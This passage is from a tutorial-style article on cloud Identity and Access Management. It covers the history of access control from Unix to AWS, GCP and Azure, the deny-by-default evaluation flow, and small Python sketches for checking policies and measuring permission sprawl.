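    {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::prod-data/exports/*"},
    {"Effect": "Deny", "Action": "s3:*", "Resource": "arn:aws:s3:::prod-data/exports/secret/*"},
]

print(evaluate(statements, "s3:GetObject", "arn:aws:s3:::prod-data/exports/report.csv"))
print(evaluate(statements, "s3:GetObject", "arn:aws:s3:::prod-data/exports/secret/keys.csv"))
print(evaluate(statements, "s3:PutObject", "arn:aws:s3:::prod-data/exports/report.csv"))
```

The three calls exercise the three outcomes: a matching Allow, a Deny that overrides a matching Allow, and a request no statement mentions.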

Understanding why it works that way requires tracing how access control evolved — and what kept breaking at each stage.

A few years into my career managing Linux infrastructure, I was handed a production server audit. The task was straightforward: find out who had access to what. I pulled /etc/passwd, checked the sudoers file, reviewed SSH authorized_keys across the fleet.

Three days later, I had a spreadsheet nobody wanted to read.

The problem wasn’t that the access was wrong. Most of it was fine. The problem was that nobody — not the team lead, not the security team, not the engineers who’d been there five years — could tell me why a particular account had access to a particular server. It had accumulated. People joined, got access, changed teams, left. The access stayed.

That was a 40-server fleet in 2012.

Fast-forward to a cloud environment today: you might have 50 engineers, 300 Lambda functions, 20 microservices, CI/CD pipelines, third-party integrations, compliance scanners — all making API calls, all needing access to something. The identity sprawl problem I spent three days auditing manually on 40 servers now exists at a scale where manual auditing isn’t even a conversation.

This is the problem Identity and Access Management exists to solve. Not just in theory — in practice, at the scale cloud infrastructure demands.


How We Got Here — The Evolution of Access Control

To understand why cloud IAM works the way it does, you need to trace how access control evolved. The design decisions in AWS IAM, GCP, and Azure didn’t come out of nowhere. They’re answers to lessons learned the hard way across decades of broken systems.

The Unix Model (1970s–1990s): Simple and Sufficient

Unix got the fundamentals right early. Every resource (file, device, process) has an owner and a group. Every action is one of three: read, write, execute. Every user is either the owner, in the group, or everyone else.

-rw-r--r--  1 vamshi  engineers  4096 Apr 11 09:00 deploy.conf
# owner can read/write | group can read | others can read

For a single machine or a small network, this model is elegant. The permissions are visible in an ls -l listing. Reasoning about access is straightforward. Auditing means reading a few files.
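The owner/group/other model is compact enough to decode in a few lines. As a small Python sketch using only the standard library `stat` module, the mode behind the listing above (a regular file with permissions 644) can be rendered and queried like this; the `can` helper is a hypothetical name for illustration.

```python
import stat

# Regular file (S_IFREG) with rw- for owner, r-- for group, r-- for others
mode = stat.S_IFREG | 0o644

# Render the mode the way ls -l does
print(stat.filemode(mode))

# One permission bit per (class, action) pair
BITS = {
    ("owner", "read"): stat.S_IRUSR, ("owner", "write"): stat.S_IWUSR, ("owner", "execute"): stat.S_IXUSR,
    ("group", "read"): stat.S_IRGRP, ("group", "write"): stat.S_IWGRP, ("group", "execute"): stat.S_IXGRP,
    ("others", "read"): stat.S_IROTH, ("others", "write"): stat.S_IWOTH, ("others", "execute"): stat.S_IXOTH,
}


def can(mode: int, who: str, what: str) -> bool:
    """Return True if the given class (owner/group/others) holds the permission."""
    return bool(mode & BITS[(who, what)])


print(can(mode, "owner", "write"))
print(can(mode, "group", "write"))
```

Nine bits answer every access question on the file, which is exactly why the model is easy to audit and also why it has no room for anything finer-grained.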

However, the cracks started showing when organizations grew. You’d add sudo to give specific commands to specific users. Then sudoers files became 300 lines long. Then you’d have shared accounts because managing individual ones was “too much overhead.” Shared accounts mean no individual accountability. No accountability means no audit trail worth anything.

The Directory Era (1990s–2000s): Centralise or Collapse

As networks grew, every server managing its own /etc/passwd became untenable. Enter LDAP and Active Directory. Instead of distributing identity management across every machine, you centralised it: one directory, one place to add users, one place to disable them when someone left.

This was a significant step forward. Onboarding got faster. Offboarding became reliable. Group membership drove access to resources across the network.

Why Groups Became the New Problem

But the permission model was still coarse. You were either in the Domain Admins group or you weren’t. “Read access to the file share” was a group. “Deploy to the staging web server” was a group. Managing fine-grained permissions at scale meant managing hundreds of groups, and the groups themselves became the audit nightmare.

I spent time in environments like this. The group named SG_Prod_App_ReadWrite_v2_FINAL that nobody could explain. The AD group from a project that ended three years ago but still had twenty members. The contractor whose AD account was disabled but whose service account was still running a nightly job.

The directory model centralised identity. It didn’t solve the permissions sprawl problem.

The Cloud Shift (2006–2014): Everything Changes

AWS launched EC2 in 2006. In 2011, AWS IAM went into general availability. That date matters — for the first five years of AWS, access control was primitive. Root accounts. Access keys. No roles.

Early AWS environments I’ve seen (and had to clean up) reflect this era: a single root account access key shared across a team, rotated manually on a shared spreadsheet. Static credentials in application config files. EC2 instances with AdministratorAccess because “it was easier at the time.”

The Model That Changed Everything

The AWS team understood what they’d built was dangerous. IAM in 2011 introduced the model that all three major cloud providers now share: deny-by-default, policy-driven, principal-based access control. Not “who is in which group.” The question became: which policy explicitly grants this specific action on this specific resource to this specific identity.

GCP launched its IAM model with a different flavour in 2012 — hierarchical, additive, binding-based. Azure RBAC came to general availability in 2014, built on top of Active Directory’s identity model.

By 2015, the modern cloud IAM era was established. The primitives existed. The problem shifted from “does IAM exist?” to “are we using it correctly?” — and most teams were not.

In practice, that question is still the right one to ask today.


The Problem IAM Actually Solves

Here’s the honest version of what IAM is for, based on what I’ve seen go wrong without it.

Without proper IAM, you get one of two outcomes:

The first is what I call the “it works” environment. Everything runs. The developers are happy. Access requests take five minutes because everyone gets the same broad policy. And then a Lambda function’s execution role — which had s3:* on * because someone once needed to debug something — gets its credentials exposed through an SSRF vulnerability in the app it runs. That role can now read every bucket in the account, including the one with the customer database exports.

The second is the “it’s secure” environment. Access is locked down. Every request goes through a ticket. The ticket goes to a security team that approves it in three to five business days. Engineers work around it by storing credentials locally. The workarounds become the real access model. The formal IAM posture and the actual access posture diverge. The audit finds the formal one. Attackers find the real one.

IAM, done right, is the discipline of walking the line between those two outcomes. It’s not a product you buy or a feature you turn on. It’s a practice — a continuous process of defining what access exists, why it exists, and whether it’s still needed.


The Core Concepts — Taught, Not Listed

Let me walk you through the vocabulary you need, grounded in what each concept means in practice.

Identity: Who Is Making This Request?

An identity is any entity that can hold a credential and make requests. In cloud environments, identities split into two types:

Human identities are engineers, operators, and developers. They authenticate via the console, CLI, or SDK. They should ideally authenticate through a central IdP (Okta, Google Workspace, Entra ID) using federation — more on that in SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?.

Machine identities are everything else: Lambda functions, EC2 instances, Kubernetes pods, CI/CD pipelines, monitoring agents, data pipelines. In most production environments, machine identities outnumber human identities by 10:1 or more.

This ratio matters. When your security model is designed primarily for human access, the 90% of identities that are machines become an afterthought. That’s where access keys end up in environment variables, where Lambda functions get broad permissions because nobody thought carefully about what they actually need, where the real attack surface lives.

Principal: The Authenticated Identity Making a Specific Request

A principal is an identity that has been authenticated and is currently making a request. The distinction from “identity” is subtle but important: the principal includes the context of how the identity authenticated.

In AWS, the same IAM role assumed by an EC2 instance, by a Lambda function, and by a developer’s CLI session yields three different principals. Each assumption creates its own role session, and the session name, source, and expiration differ.

{
  "Principal": {
    "AWS": "arn:aws:iam::123456789012:role/DataPipelineRole"
  }
}

In GCP, the equivalent term is principal (member in older documentation and in the members field of a binding). In Azure, it’s security principal: a user, group, service principal, or managed identity.

Resource: What Is Being Accessed?

A resource is whatever is being acted upon. In AWS, every resource has an ARN (Amazon Resource Name) — a globally unique identifier.

arn:aws:s3:::customer-data-prod          # S3 bucket
arn:aws:s3:::customer-data-prod/*        # everything inside that bucket
arn:aws:ec2:ap-south-1:123456789012:instance/i-0abcdef1234567890
arn:aws:iam::123456789012:role/DataPipelineRole

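The ARN structure tells you: partition, service, region, account, and the resource type and name. Some fields can be empty: S3 bucket ARNs carry no region or account, and IAM ARNs carry no region. Once you can read ARNs fluently, IAM policies become much less intimidating.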
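To make the structure concrete, here is a small sketch that splits an ARN into its colon-separated fields. The Arn type and parse_arn function are illustrative names, not part of any AWS SDK, and the sketch does not validate service-specific resource formats.

```python
from typing import NamedTuple


class Arn(NamedTuple):
    partition: str  # "aws" in the standard partition
    service: str
    region: str     # empty for global services such as IAM and S3 buckets
    account: str    # empty for S3 bucket ARNs
    resource: str   # resource type and name, format varies by service


def parse_arn(arn: str) -> Arn:
    """Split an ARN of the form arn:partition:service:region:account:resource."""
    # Limit the split to 5 so colons inside the resource part are preserved.
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, partition, service, region, account, resource = parts
    return Arn(partition, service, region, account, resource)


for example in (
    "arn:aws:s3:::customer-data-prod",
    "arn:aws:ec2:ap-south-1:123456789012:instance/i-0abcdef1234567890",
    "arn:aws:iam::123456789012:role/DataPipelineRole",
):
    print(parse_arn(example))
```

Reading the empty fields is as useful as reading the filled ones: a missing account in an S3 ARN is a reminder that bucket names are unique across all accounts.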

Action: What Is Being Done?

An action (AWS/Azure) or permission (GCP) is the operation being attempted. AWS expresses these as service:Operation strings; GCP uses a dotted service.resource.verb form:

# AWS
s3:GetObject           # read a specific object
s3:PutObject           # write an object
s3:DeleteObject        # delete an object — treat differently than read
iam:PassRole           # assign a role to a service — one of the most dangerous permissions
ec2:DescribeInstances  # list instances — often overlooked, but reveals infrastructure

# GCP
storage.objects.get
storage.objects.create
iam.serviceAccounts.actAs   # impersonate a service account — equivalent to iam:PassRole danger

When I audit IAM configurations, I pay special attention to any policy that includes iam:*, iam:PassRole, or wildcards like "Action": "*". These are the permissions that let a compromised identity create new identities, assign itself more power, or impersonate other identities. They’re the privilege escalation primitives; more on that in AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise.

Policy: The Document That Connects Everything

A policy is a document that says: this principal can perform these actions on these resources, under these conditions.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadCustomerDataBucket",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::customer-data-prod",
        "arn:aws:s3:::customer-data-prod/*"
      ]
    }
  ]
}

Notice what’s explicit here: the effect (Allow), the exact actions (not s3:*), and the exact resource (not *). Every word in this document is a deliberate decision. The moment you start using wildcards to save typing, you’re writing technical debt that will come back as a security incident.
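A quick way to catch wildcards before they ship is a small check over the policy document. The sketch below is a rough illustration, not a replacement for a real policy linter: find_wildcards is a made-up helper, it only looks at Allow statements, and it flags a bare "*" or a service-wide action such as s3:*.

```python
def find_wildcards(policy: dict) -> list[str]:
    """Return a finding for each broad wildcard in the policy's Allow statements."""
    findings = []
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        label = stmt.get("Sid", f"statement[{i}]")
        for key in ("Action", "Resource"):
            values = stmt.get(key, [])
            if isinstance(values, str):
                values = [values]
            for value in values:
                # Flag "*" anywhere, and service-wide actions like "s3:*".
                if value == "*" or (key == "Action" and value.endswith(":*")):
                    findings.append(f"{label}: {key} {value!r}")
    return findings


scoped = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ReadCustomerDataBucket",
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": [
            "arn:aws:s3:::customer-data-prod",
            "arn:aws:s3:::customer-data-prod/*",
        ],
    }],
}
# Hypothetical "debug" policy of the kind that tends to outlive its purpose.
broad = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
}

print(find_wildcards(scoped))  # []
print(find_wildcards(broad))
```

The object-level pattern customer-data-prod/* is deliberately not flagged: it is scoped to one bucket, which is the point of the policy above.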


How IAM Actually Works — The Decision Flow

When any API call hits a cloud service, an IAM engine evaluates it. Understanding this flow is the foundation of debugging access issues, and more importantly, of understanding why your security posture is what it is.

Request arrives:
  Action:    s3:PutObject
  Resource:  arn:aws:s3:::customer-data-prod/exports/2026-04-11.csv
  Principal: arn:aws:iam::123456789012:role/DataPipelineRole
  Context:   { source_ip: "10.0.2.15", mfa: false, time: "02:30 UTC" }

IAM Engine evaluation (AWS):
  1. Is there an explicit Deny anywhere? → No
  2. Does the SCP (if any) allow this? → Yes
  3. Does the identity-based policy allow this? → Yes (via DataPipelinePolicy)
  4. Does the resource-based policy (bucket policy) allow or deny? → No explicit rule → not required here: for same-account access, the identity-based Allow is sufficient
  5. Is there a permissions boundary? → No
  Decision: ALLOW

The critical insight here: cloud IAM is deny-by-default. There is no implicit allow. If there is no policy that explicitly grants s3:PutObject to this role on this bucket, the request fails. The only way in is through an explicit "Effect": "Allow".

This is the opposite of how most traditional systems work. On a typical Unix system, new files are created world-readable by default (a umask of 022 yields -rw-r--r--), so anyone can read them unless you actively restrict access. In cloud IAM, nothing is accessible unless you actively grant it.

When I’m debugging an AccessDenied error — and every engineer who works with cloud IAM spends significant time doing this — the mental model is always: “what is the chain of explicit Allows that should be granting this access, and at which layer is it missing?”
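The core of the decision flow above (explicit Deny wins, then an explicit Allow is required, otherwise the request is implicitly denied) can be sketched in a few lines. This is a toy model under stated assumptions: it ignores SCPs, permissions boundaries, conditions, and cross-account rules, it approximates IAM wildcard matching with Python's fnmatch, and the statements are a guess at what a policy like DataPipelinePolicy might contain.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    return [value] if isinstance(value, str) else list(value)


def _matches(stmt: dict, action: str, resource: str) -> bool:
    # Action names are compared case-insensitively; resources are not.
    action_ok = any(
        fnmatchcase(action.lower(), pattern.lower())
        for pattern in _as_list(stmt["Action"])
    )
    resource_ok = any(
        fnmatchcase(resource, pattern) for pattern in _as_list(stmt["Resource"])
    )
    return action_ok and resource_ok


def evaluate(statements: list, action: str, resource: str) -> str:
    matching = [s for s in statements if _matches(s, action, resource)]
    if any(s["Effect"] == "Deny" for s in matching):
        return "DENY (explicit)"
    if any(s["Effect"] == "Allow" for s in matching):
        return "ALLOW"
    return "DENY (implicit)"  # nothing granted it, so it fails


# Assumed contents of the role's identity-based policy.
statements = [{
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:PutObject"],
    "Resource": "arn:aws:s3:::customer-data-prod/*",
}]
target = "arn:aws:s3:::customer-data-prod/exports/2026-04-11.csv"

print(evaluate(statements, "s3:PutObject", target))     # ALLOW
print(evaluate(statements, "s3:DeleteObject", target))  # DENY (implicit)
```

When debugging an AccessDenied, the useful question is which of the three return paths the request took: a matching Deny, or no matching Allow at all.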


Why This Is Harder Than It Looks

Understanding the concepts is the easy part. The hard part is everything that happens at organisational scale over time.

Scale. A real AWS account in a growing company might have 600+ IAM roles, 300+ policies, and 40+ cross-account trust relationships. None of these were designed together. They evolved incrementally, each change made by someone who understood the context at the time and may have left the organisation since. The cumulative effect is an IAM configuration that no single person fully understands.

Drift. IAM configs don’t stay clean. An engineer needs to debug a production issue at 2 AM and grants themselves broad access temporarily. The temporary access never gets revoked. Multiply that by a team of 20 over three years. I’ve audited environments where 60% of the permissions in a role had never been used — not once — in the 90-day CloudTrail window. That unused 60% is pure attack surface.

The machine identity blind spot. Most IAM governance practices were built for human users. Service accounts, Lambda roles, and CI/CD pipeline identities get created rapidly and reviewed rarely. In my experience, these are the identities most likely to have excess permissions, least likely to be in the access review process, and most likely to be the initial foothold in a cloud breach.

The gap between granted and used. This one surprised me most when I first started doing cloud security work. AWS data from real customer accounts shows the average IAM entity uses less than 5% of its granted permissions. That 95% excess isn’t just waste; it’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.
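Measuring that gap is a set difference once you have two lists: what a role is granted and what it was actually observed calling. The sketch below assumes both lists have already been extracted and normalised to plain action names (wildcards expanded, consistent casing); the sample data is invented for illustration.

```python
def unused_permissions(granted: set[str], used: set[str]) -> tuple[set[str], float]:
    """Return the granted-but-never-used actions and their share of all grants."""
    unused = granted - used
    ratio = len(unused) / len(granted) if granted else 0.0
    return unused, ratio


# Hypothetical role: five granted actions, two seen in the audit window.
granted = {
    "s3:GetObject",
    "s3:PutObject",
    "s3:DeleteObject",
    "s3:ListBucket",
    "iam:PassRole",
}
used = {"s3:GetObject", "s3:ListBucket"}

unused, ratio = unused_permissions(granted, used)
print(sorted(unused))
print(f"{ratio:.0%} of granted permissions were never used")
```

The ratio is a rough prioritisation signal, not a verdict: an unused iam:PassRole deserves attention long before an unused read permission does.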


IAM Across AWS, GCP, and Azure — The Conceptual Map

The three major providers implement IAM differently in syntax, but the same model underlies all of them. Once you understand one deeply, the others become a translation exercise.

| Concept | AWS | GCP | Azure |
|---|---|---|---|
| Identity store | IAM users / roles | Google accounts, Workspace | Entra ID |
| Machine identity | IAM Role (via instance profile or AssumeRole) | Service Account | Managed Identity |
| Access grant mechanism | Policy document attached to identity or resource | IAM binding on resource (member + role + condition) | Role Assignment (principal + role + scope) |
| Hierarchy | Account is the boundary; Org via SCPs | Org → Folder → Project → Resource | Tenant → Management Group → Subscription → Resource Group → Resource |
| Default stance | Deny | Deny | Deny |
| Wildcard risk | "Action": "*" on "Resource": "*" | Primitive roles (viewer/editor/owner) | Owner or Contributor assigned broadly |

The hierarchy point is worth pausing on. AWS is relatively flat — the account is the primary security boundary. GCP’s hierarchy means a binding at the Organisation level propagates down to every project. Azure’s hierarchy means a role assignment at the Management Group level flows through every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits.

This will matter in GCP IAM Policy Inheritance and Azure RBAC Explained when we go deep on GCP and Azure specifically. For now, the takeaway is: understand where in the hierarchy a permission is granted, because the same permission granted at the wrong level has a very different security implication.
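To see why the level matters, the sketch below models a tiny GCP-style hierarchy in which grants are additive and flow downward. The node names, the member, and the helper functions are all hypothetical, and the model ignores deny policies and conditions.

```python
# Child -> parent links for a small, made-up hierarchy.
PARENT = {
    "project-payments": "folder-prod",
    "project-sandbox": "folder-dev",
    "folder-prod": "org",
    "folder-dev": "org",
    "org": None,
}


def ancestors(node):
    """Yield the node itself, then each parent up to the root."""
    while node is not None:
        yield node
        node = PARENT[node]


def effective_roles(bindings: dict, member: str, node: str) -> set:
    """Union of roles granted to member at node and at every level above it."""
    roles = set()
    for level in ancestors(node):
        roles |= bindings.get(level, {}).get(member, set())
    return roles


def blast_radius(level: str) -> list:
    """Every node that inherits a grant made at the given level."""
    return sorted(n for n in PARENT if level in ancestors(n))


bindings = {
    "org": {"alice": {"roles/viewer"}},
    "project-payments": {"alice": {"roles/storage.objectAdmin"}},
}

print(effective_roles(bindings, "alice", "project-payments"))
print(effective_roles(bindings, "alice", "project-sandbox"))
print(blast_radius("org"))          # every node in the hierarchy
print(blast_radius("folder-prod"))  # only the prod folder and its project
```

The same role bound at org reaches five nodes here and two when bound at folder-prod, which is the blast-radius point in miniature.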


Framework Alignment

If you’re mapping this episode to a control framework — for a compliance audit, a certification study, or building a security program — here’s where it lands:

| Framework | Reference | What It Covers Here |
|---|---|---|
| CISSP | Domain 1: Security & Risk Management | IAM as a risk reduction control; blast radius is a risk variable |
| CISSP | Domain 5: Identity and Access Management | Direct implementation: who can do what, to which resources, under what conditions |
| ISO 27001:2022 | 5.15 Access control | Policy requirements for restricting access to information and systems |
| ISO 27001:2022 | 5.16 Identity management | Managing the full lifecycle of identities in the organization |
| ISO 27001:2022 | 5.18 Access rights | Provisioning, review, and removal of access rights |
| SOC 2 | CC6.1 | Logical access security controls to protect against unauthorized access |
| SOC 2 | CC6.3 | Access removal and review processes to limit unauthorized access |

Key Takeaways

  • IAM evolved from Unix file permissions → directory services → cloud policy engines, driven by scale and the failure modes of each prior model
  • Cloud IAM is deny-by-default: every access requires an explicit Allow somewhere in the policy chain
  • Identities are human or machine; in production, machines dominate — and they’re the under-governed majority
  • A policy binds a principal to actions on resources; every word is a deliberate security decision
  • The hardest IAM problems aren’t technical — they’re organisational: drift, unused permissions, machine identities nobody owns, and access reviews that never happen
  • The gap between granted and used permissions is where attackers find room to move

What’s Next

Now that you understand what IAM is and why it exists, the next question is the one that trips up even experienced engineers: what’s the difference between authentication and authorization, and why does conflating them cause security failures?

EP02 works through both — how cloud providers implement each, where the boundary sits, and why getting this boundary wrong creates exploitable gaps.

Next: Authentication vs Authorization: AWS AccessDenied Explained
